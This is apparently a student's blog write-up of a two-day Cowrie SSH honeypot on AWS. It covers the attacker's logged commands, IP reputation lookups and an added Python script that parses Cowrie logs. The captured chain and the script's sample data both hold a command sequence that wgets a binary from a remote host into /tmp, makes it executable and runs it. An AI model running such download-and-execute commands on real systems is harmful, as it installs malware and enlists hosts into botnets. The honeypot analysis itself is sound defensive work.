The Two Day Cowrie Honeypot
I was tasked with starting up a honeypot using Amazon Web Services (AWS). I left the Cowrie honeypot online for about two days and saved the data into my Elastic dashboard for further threat analysis. One IP got my attention since the network host was FranTech Solutions.
___________________________________________________________________
Commands Used by IP (Repeated Three Times)
./x86_64 x86xhed
cat /etc/issue
cd /tmp/
wget http://194.85.249.86/x86_64
chmod 777 *
./x86_64 x86xhed
___________________________________________________________________
Looking At What The Commands Do
For some reason, the first command that is run seems to execute a file that is not on the machine yet. I have tried running this file in the tmp folder, which I am assuming is where it is supposed to be, judging from the commands that follow.
As for the next command, I did not know what it meant even after using it on the command line. I went on the internet and this is what I found: it seems that running the cat command on /etc/issue displays a welcome and/or warning line to SSH users when they log in.
The next command changes into the tmp directory, presumably to download malware, which is what happens next.
The IP address 194.85.249.86 is used as the web source for the wget command, which downloads content from the web.
After the file is downloaded, its permissions are changed to allow read, write and execute access to all users. The file is then executed.
___________________________________________________________________
What I Found Researching the Attacker's IP
For this next section I will display the information I found on this IP through various websites, which I will of course provide the URLs for. I started off with research on the attacker's IP.
Clicking on the IP address in the dashboard brought me to this information page which gave me the origins of this IP. The location of the IP is in Las Vegas, United States. The network owner of this IP is FranTech Solutions which has some history hosting malware like the one I’ve encountered. The email reputation is poor, so from that I can assume emails from this IP are usually meant to harm the receiver.
The location data pointing to Las Vegas makes sense. Las Vegas is a very good place to host data servers; from what the web says, "Las Vegas is the #1 Safest City From Natural Disasters in the USA".
This was a nice find for me because it solidified early on that this was a dangerous IP, which of course is expected. Still, having solid evidence like this is great.
BrightCloud gave me confirmation that this IP was trying to host a botnet, which is typical for a honeypot. Though this was expected, it's still good to have backing evidence.
From the information above it shows that the attacks are coming from the middle of California. This is actually very near the network host location, which is Las Vegas.
This screenshot was taken from the dashboard section of Elastic. It shows the usernames and passwords the attacker IP used to try to log in to the honeypot, all of which failed. The larger a credential appears, the more often the attacker tried it. As you can see, "root" was used the most as the username, because if they somehow logged in as root they would have access to just about everything.
This site is called ipvoid.com. The website lets you input an IP address to look up and then displays the details in this table format. The blacklist status is 20/115, with the listings coming from DNS-based blacklists (DNSBL).
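As an added example (not part of the original post and not Cowrie's own code), the following Python reads Cowrie's JSON log and reproduces both analyses above from the raw events: the per-session command sequence with the URL that wget fetched, and the credential counts behind the dashboard chart. The log lines, IP addresses and URL are constructed samples; only the event ids and field names are Cowrie's.

```python
import json
import re
from collections import Counter, defaultdict

# Constructed sample Cowrie JSON log lines (not the author's capture); the
# eventid values and field names follow Cowrie's JSON output format.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","session":"s1","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","session":"s1","username":"root","password":"admin"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","session":"s2","username":"admin","password":"admin"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","session":"s2","username":"root","password":"123456"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.7","session":"s3","username":"root","password":"toor"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","session":"s3","input":"cat /etc/issue"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","session":"s3","input":"cd /tmp/"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","session":"s3","input":"wget http://192.0.2.10/x86_64"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","session":"s3","input":"chmod 777 *"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","session":"s3","input":"./x86_64 x86xhed"}
not json: a line the parser must skip
"""

URL_RE = re.compile(r"https?://\S+")
LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")

def parse_events(text):
    """Return one dict per well-formed JSON line; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events

def credential_counts(events):
    """(username, password) -> attempts, the data behind the dashboard tag cloud."""
    return Counter((e["username"], e["password"]) for e in events if e.get("eventid") in LOGIN_EVENTS)

def commands_by_session(events):
    """src_ip -> {session -> commands in the order they were typed}."""
    out = defaultdict(lambda: defaultdict(list))
    for e in events:
        if e.get("eventid") == "cowrie.command.input":
            out[e["src_ip"]][e["session"]].append(e["input"])
    return out

def staging_urls(commands):
    """URLs fetched with wget or curl: the hosts worth looking up next."""
    return [u for c in commands if c.lstrip().startswith(("wget ", "curl ")) for u in URL_RE.findall(c)]
```

On a real deployment, feed it the contents of Cowrie's log/cowrie.json and the same three functions give you the command chains and credential counts per source IP without the dashboard.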
___________________________________________________________________
What I Found From the Wget IP
This is the information that I found while doing some research on the IP that I found in the command line.
This screenshot shows the related host and IP. This one also has a poor email reputation status, which isn't too surprising considering it is used to serve malware in the wget command. Strangely enough, this IP draws its origins from Germany of all places. I'd think it would originate from the US because that's where the host is.
Using the BrightCloud website showed me, strangely enough, that there is no threat found on the wget IP, despite other sources saying that this IP is in fact dangerous.
Using the same website as before, I was able to see that this IP (unsurprisingly) is blacklisted. Not on as many blacklists as the previous query, but blacklisted nonetheless.